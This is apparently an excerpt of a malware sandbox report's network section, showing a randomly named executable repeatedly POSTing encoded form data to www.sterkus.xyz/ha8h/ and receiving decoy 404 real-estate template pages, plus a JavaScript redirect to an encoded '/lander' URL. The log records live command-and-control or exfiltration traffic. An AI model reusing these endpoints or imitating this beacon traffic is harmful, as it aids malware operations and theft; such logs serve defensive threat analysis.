                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 69 34 66 54 62 56 3d 6a 4e 33 4b 6b 4e 38 78 63 39 66 73 65 71 74 79 72 34 58 38 6e 4a 66 48 39 34 74 7a 51 73 2b 61 76 51 6a 77 6e 66 6f 58 66 5a 6b 52 61 49 58 4c 32 4a 5a 43 30 72 31 4a 54 74 4f 58 30 34 31 71 2f 38 4d 45 47 52 53 47 4f 6d 32 78 53 70 45 70 56 70 49 7a 57 49 31 63 38 61 48 4b 42 38 34 61 57 2f 61 79 46 5a 4f 36 43 69 37 6d 48 47 55 71 62 4d 49 71 43 5a 57 32 43 7a 52 62 45 6f 57 73 56 5a 4d 32 4d 74 34 3d 26 61 7a 71 3d 66 64 4b 4c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?i4fTbV=jN3KkN8xc9fseqtyr4X8nJfH94tzQs+avQjwnfoXfZkRaIXL2JZC0r1JTtOX041q/8MEGRSGOm2xSpEpVpIzWI1c8aHKB84aW/ayFZO6Ci7mHGUqbMIqCZW2CzRbEoWsVZM2Mt4=&azq=fdKL"}</script></head></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.649735209.74.95.29804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:42:00.571456909 CEST680OUTPOST /ha8h/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.sterkus.xyz
                                                                Origin: http://www.sterkus.xyz
                                                                Referer: http://www.sterkus.xyz/ha8h/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 43 5a 5a 67 5a 38 77 52 47 7a 33 68 59 74 31 41 72 49 4d 59 6f 46 2b 73 57 76 45 64 59 70 59 56 58 6f 45 34 62 65 34 35 36 30 79 6f 69 4d 4a 35 77 51 44 52 4e 41 76 48 55 49 50 78 6c 43 68 7a 67 72 64 51 47 35 2b 6d 35 2b 5a 50 57 42 47 43 4d 56 76 75 2b 67 59 59 2f 54 79 59 46 4c 45 76 72 73 55 66 46 50 70 52 33 53 68 6f 56 48 2b 6e 55 77 4d 42 69 36 51 55 4f 72 36 79 73 6e 44 39 54 6b 72 58 35 6d 54 62 64 6b 57 72 56 42 32 2f 5a 50 59 68 4d 6d 2f 49 76 69 68 51 4b 4b 4d 75 68 63 49 62 78 78 33 32 65 68 72 41 31 4f 48 77 46 37 5a 69 4a 4b 55 36 35 56 46 61 55 72 61 37 75 6c 56 41 65 77 6f 67 69 2b 74 51
                                                                Data Ascii: i4fTbV=CZZgZ8wRGz3hYt1ArIMYoF+sWvEdYpYVXoE4be4560yoiMJ5wQDRNAvHUIPxlChzgrdQG5+m5+ZPWBGCMVvu+gYY/TyYFLEvrsUfFPpR3ShoVH+nUwMBi6QUOr6ysnD9TkrX5mTbdkWrVB2/ZPYhMm/IvihQKKMuhcIbxx32ehrA1OHwF7ZiJKU65VFaUra7ulVAewogi+tQ
                                                                Sep 22, 2024 17:42:01.169397116 CEST1236INHTTP/1.1 404 Not Found
                                                                Date: Sun, 22 Sep 2024 15:42:01 GMT
                                                                Server: Apache
                                                                X-Frame-Options: SAMEORIGIN
                                                                Content-Length: 13928
                                                                X-XSS-Protection: 1; mode=block
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                                Sep 22, 2024 17:42:01.169428110 CEST1236INData Raw: 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 61 73 73 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d
                                                                Data Ascii: > <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="cs
                                                                Sep 22, 2024 17:42:01.169445992 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6d 2d 30 20 74 65 78 74 2d 70 72 69 6d 61 72 79 22 3e 4d 61 6b 61 61 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20
                                                                Data Ascii: <h1 class="m-0 text-primary">Makaan</h1> </a> <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-
                                                                Sep 22, 2024 17:42:01.169462919 CEST672INData Raw: 73 3d 22 6e 61 76 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 64 72
                                                                Data Ascii: s="nav-item dropdown"> <a href="#" class="nav-link dropdown-toggle active" data-bs-toggle="dropdown">Pages</a> <div class="dropdown-menu rounded-0 m-0">
                                                                Sep 22, 2024 17:42:01.169481993 CEST1236INData Raw: 65 72 74 79 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6e 61 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d
                                                                Data Ascii: erty</a> </div> </nav> </div> ... Navbar End --> ... Header Start --> <div class="container-fluid header bg-white p-0"> <div class="row g-0 align-items-center
                                                                Sep 22, 2024 17:42:01.169502974 CEST224INData Raw: 3d 22 30 2e 31 73 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 20 33 35 70 78 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: ="0.1s" style="padding: 35px;"> <div class="container"> <div class="row g-2"> <div class="col-md-10"> <div class="row g-2">
                                                                Sep 22, 2024 17:42:01.169517040 CEST1236INData Raw: 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 63 6c
                                                                Data Ascii: <div class="col-md-4"> <input type="text" class="form-control border-0 py-3" placeholder="Search Keyword"> </div> <div class="col-md-4">
                                                                Sep 22, 2024 17:42:01.169533014 CEST1236INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 32 22 3e 0d 0a 20 20 20 20
                                                                Data Ascii: div> </div> <div class="col-md-2"> <button class="btn btn-dark border-0 w-100 py-3">Search</button> </div> </div> </div>
                                                                Sep 22, 2024 17:42:01.169548988 CEST448INData Raw: 70 74 2d 35 20 6d 74 2d 35 20 77 6f 77 20 66 61 64 65 49 6e 22 20 64 61 74 61 2d 77 6f 77 2d 64 65 6c 61 79 3d 22 30 2e 31 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 70 79
                                                                Data Ascii: pt-5 mt-5 wow fadeIn" data-wow-delay="0.1s"> <div class="container py-5"> <div class="row g-5"> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Get In Touc
                                                                Sep 22, 2024 17:42:01.170106888 CEST1236INData Raw: 36 37 38 39 30 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 65 6e 76 65 6c 6f 70 65 20 6d 65 2d 33 22 3e
                                                                Data Ascii: 67890</p> <p class="mb-2"><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-social" href=""><i c
                                                                Sep 22, 2024 17:42:01.174412012 CEST1236INData Raw: 20 26 20 43 6f 6e 64 69 74 69 6f 6e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d
                                                                Data Ascii: & Condition</a> </div> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Photo Gallery</h5> <div class="row g-2 pt-2">


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.649736209.74.95.29804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:42:03.113465071 CEST704OUTPOST /ha8h/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.sterkus.xyz
                                                                Origin: http://www.sterkus.xyz
                                                                Referer: http://www.sterkus.xyz/ha8h/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 43 5a 5a 67 5a 38 77 52 47 7a 33 68 5a 4e 46 41 70 76 51 59 67 46 2b 76 61 50 45 64 58 4a 59 52 58 6f 34 34 62 66 4d 58 36 43 71 6f 69 74 35 35 7a 55 33 52 4b 41 76 48 4d 34 4f 35 72 69 68 34 67 72 52 69 47 39 36 6d 35 2b 4e 50 57 46 4f 43 4e 69 44 70 2f 77 59 65 30 7a 79 61 59 37 45 76 72 73 55 66 46 4c 41 47 33 54 46 6f 56 33 69 6e 56 52 4d 43 35 61 51 62 4a 72 36 79 36 58 44 35 54 6b 72 35 35 6a 79 32 64 69 53 72 56 45 4b 2f 5a 2b 59 69 46 6d 2f 4f 67 43 67 51 43 4a 78 47 72 74 74 61 79 79 76 48 4d 52 37 31 35 59 47 71 5a 49 5a 42 62 61 30 34 35 58 64 6f 55 4c 61 52 73 6c 74 41 4d 6e 6b 48 74 4b 49 7a 77 61 59 6b 32 5a 47 58 4c 49 44 7a 38 4c 65 58 6b 57 31 78 65 77 3d 3d
                                                                Data Ascii: i4fTbV=CZZgZ8wRGz3hZNFApvQYgF+vaPEdXJYRXo44bfMX6Cqoit55zU3RKAvHM4O5rih4grRiG96m5+NPWFOCNiDp/wYe0zyaY7EvrsUfFLAG3TFoV3inVRMC5aQbJr6y6XD5Tkr55jy2diSrVEK/Z+YiFm/OgCgQCJxGrttayyvHMR715YGqZIZBba045XdoULaRsltAMnkHtKIzwaYk2ZGXLIDz8LeXkW1xew==
                                                                Sep 22, 2024 17:42:03.697058916 CEST1236INHTTP/1.1 404 Not Found
                                                                Date: Sun, 22 Sep 2024 15:42:03 GMT
                                                                Server: Apache
                                                                X-Frame-Options: SAMEORIGIN
                                                                Content-Length: 13928
                                                                X-XSS-Protection: 1; mode=block
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                                Sep 22, 2024 17:42:03.697113991 CEST224INData Raw: 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 61 73 73 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d
                                                                Data Ascii: > <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet -->
                                                                Sep 22, 2024 17:42:03.697150946 CEST1236INData Raw: 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61
                                                                Data Ascii: <link href="css/style.css" rel="stylesheet"></head><body> <div class="container-xxl bg-white p-0"> ... Spinner Start --> <div id="spinner" class="show bg-white position-fixed translate-middle w-100 vh-100 top
                                                                Sep 22, 2024 17:42:03.697186947 CEST224INData Raw: 73 70 61 6e 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 2d 69 63 6f 6e 22 3e 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-nav ms-auto"> <
                                                                Sep 22, 2024 17:42:03.697217941 CEST1236INData Raw: 61 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6e 61 76 2d 6c 69 6e 6b 22 3e 48 6f 6d 65 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61
                                                                Data Ascii: a href="index.html" class="nav-item nav-link">Home</a> <a href="about.html" class="nav-item nav-link">About</a> <div class="nav-item dropdown"> <a href="#" class="n
                                                                Sep 22, 2024 17:42:03.697251081 CEST224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 63 6f 6e 74 61 63 74 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 6e 61 76
                                                                Data Ascii: </div> <a href="contact.html" class="nav-item nav-link">Contact</a> </div> <a href="" class="btn btn-primary px-3 d-none d-lg-flex">Add Prop
                                                                Sep 22, 2024 17:42:03.697283983 CEST1236INData Raw: 65 72 74 79 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6e 61 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d
                                                                Data Ascii: erty</a> </div> </nav> </div> ... Navbar End --> ... Header Start --> <div class="container-fluid header bg-white p-0"> <div class="row g-0 align-items-center
                                                                Sep 22, 2024 17:42:03.697315931 CEST1236INData Raw: 3d 22 30 2e 31 73 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 20 33 35 70 78 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: ="0.1s" style="padding: 35px;"> <div class="container"> <div class="row g-2"> <div class="col-md-10"> <div class="row g-2"> <div class="co
                                                                Sep 22, 2024 17:42:03.697350979 CEST448INData Raw: 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 32 22 3e 4c 6f 63 61 74 69 6f 6e 20 32 3c 2f 6f 70 74 69 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f
                                                                Data Ascii: <option value="2">Location 2</option> <option value="3">Location 3</option> </select> </div> </div>
                                                                Sep 22, 2024 17:42:03.697387934 CEST1236INData Raw: 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 65 61 72 63 68 20 45 6e 64 20 2d 2d 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 34 30 34 20
                                                                Data Ascii: </div> </div> ... Search End --> ... 404 Start --> <div class="container-xxl py-5 wow fadeInUp" data-wow-delay="0.1s"> <div class="container text-center"> <div cla
                                                                Sep 22, 2024 17:42:03.702311993 CEST1236INData Raw: 65 20 6d 62 2d 34 22 3e 47 65 74 20 49 6e 20 54 6f 75 63 68 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61
                                                                Data Ascii: e mb-4">Get In Touch</h5> <p class="mb-2"><i class="fa fa-map-marker-alt me-3"></i>123 Street, New York, USA</p> <p class="mb-2"><i class="fa fa-phone-alt me-3"></i>+012 345 67890</p>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.649737209.74.95.29804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:42:05.663593054 CEST1717OUTPOST /ha8h/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.sterkus.xyz
                                                                Origin: http://www.sterkus.xyz
                                                                Referer: http://www.sterkus.xyz/ha8h/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 43 5a 5a 67 5a 38 77 52 47 7a 33 68 5a 4e 46 41 70 76 51 59 67 46 2b 76 61 50 45 64 58 4a 59 52 58 6f 34 34 62 66 4d 58 36 43 69 6f 69 2f 78 35 78 7a 72 52 4c 41 76 48 53 49 4f 34 72 69 68 70 67 6f 68 6d 47 39 33 64 35 38 31 50 58 6e 57 43 46 77 37 70 78 77 59 65 70 6a 79 62 46 4c 46 74 72 73 45 62 46 50 6b 47 33 54 46 6f 56 31 57 6e 63 67 4d 43 2b 71 51 55 4f 72 37 7a 73 6e 44 52 54 6b 79 45 35 6a 2f 4c 63 53 79 72 62 41 57 2f 4b 38 41 69 64 32 2f 4d 6c 43 67 2b 43 4a 39 5a 72 74 68 38 79 78 79 61 4d 58 48 31 36 76 2f 32 44 70 6c 65 47 4a 63 70 72 6e 78 32 66 64 65 55 72 6d 5a 4e 44 33 55 79 76 35 67 37 2f 75 6f 51 67 4b 6a 53 41 34 4c 4e 37 4e 36 43 67 33 73 72 4b 4e 62 34 2f 68 45 68 71 67 47 47 41 30 7a 33 69 2f 77 5a 73 55 73 71 38 55 42 39 71 44 57 6b 41 6f 71 4e 77 44 73 61 58 37 6d 75 69 62 6f 71 46 44 6b 2f 66 67 76 68 4f 78 6b 73 63 71 78 64 36 43 30 39 79 5a 71 34 33 67 75 53 59 74 32 55 66 36 44 32 38 56 6a 2b 30 76 38 4e 2f 33 59 30 65 5a 72 72 57 6f 70 2f 69 51 74 [TRUNCATED]
                                                                Data Ascii: i4fTbV=CZZgZ8wRGz3hZNFApvQYgF+vaPEdXJYRXo44bfMX6Cioi/x5xzrRLAvHSIO4rihpgohmG93d581PXnWCFw7pxwYepjybFLFtrsEbFPkG3TFoV1WncgMC+qQUOr7zsnDRTkyE5j/LcSyrbAW/K8Aid2/MlCg+CJ9Zrth8yxyaMXH16v/2DpleGJcprnx2fdeUrmZND3Uyv5g7/uoQgKjSA4LN7N6Cg3srKNb4/hEhqgGGA0z3i/wZsUsq8UB9qDWkAoqNwDsaX7muiboqFDk/fgvhOxkscqxd6C09yZq43guSYt2Uf6D28Vj+0v8N/3Y0eZrrWop/iQtFDEPTIh2YKPSQ5BZa0jCHUZ3dxR1CQ2LQuAtPeSgLzl/3zaxIz7WjVp9ffj/YE8pVsl5iSaZt8ZEbCEGC+g8TuLkYZtis9d7XYiAVXNdjIULz2D9egVXe2T1j4gJ2ZtqiIZneHkMp9LgcRMcTx3Xvq+wMf0BaR96w7a5de9sPn3+p1Mg/+5ZnotmLBrz+y6Y5MckKSoDZ7TMwV76sw++dTci3w+gp4tEWde7W2rp+Pr4bUdG4s2z4euL/cfQtp8ietFzpKv/ppHBvUCd4aZXDA53VIo6u2pl1+Hn0eMHzveWgwmY82leeEarc0luzszcWYJBCdLagk5lEZbjLe2l3f/S8zD8cOHRd69gh7+ErAeb4FrT41K4EbY57nnNQ9Z6QiXhniPIOZNg2o5aKOeEVgNez1w+7AQFGkRmJjnvIxKDyXy1u1J3u98y9OrQGLnf7MaMgIe9xRZHmhsvh4UpaljNTrh1STqlwqVOK4cYxzKhjLwHxr6jprZDjXHSMLE10ZFrQ6XqjI2Gu+0bIiXhV29FasZK335s5mkzySVItGTPkQewYvR2IhfK5e2+PfKIDQtSa/rUpP276GFGW5VP8mlM5svftFD5Karj4pYsYRFxqo3kG9bWefeoaNSXj4mPcdylZ3nKskk7UxTL7x5SkkMZl6wB8dYFzg [TRUNCATED]
                                                                Sep 22, 2024 17:42:06.336571932 CEST1236INHTTP/1.1 404 Not Found
                                                                Date: Sun, 22 Sep 2024 15:42:06 GMT
                                                                Server: Apache
                                                                X-Frame-Options: SAMEORIGIN
                                                                Content-Length: 13928
                                                                X-XSS-Protection: 1; mode=block
                                                                Connection: close
                                                                Content-Type: text/html
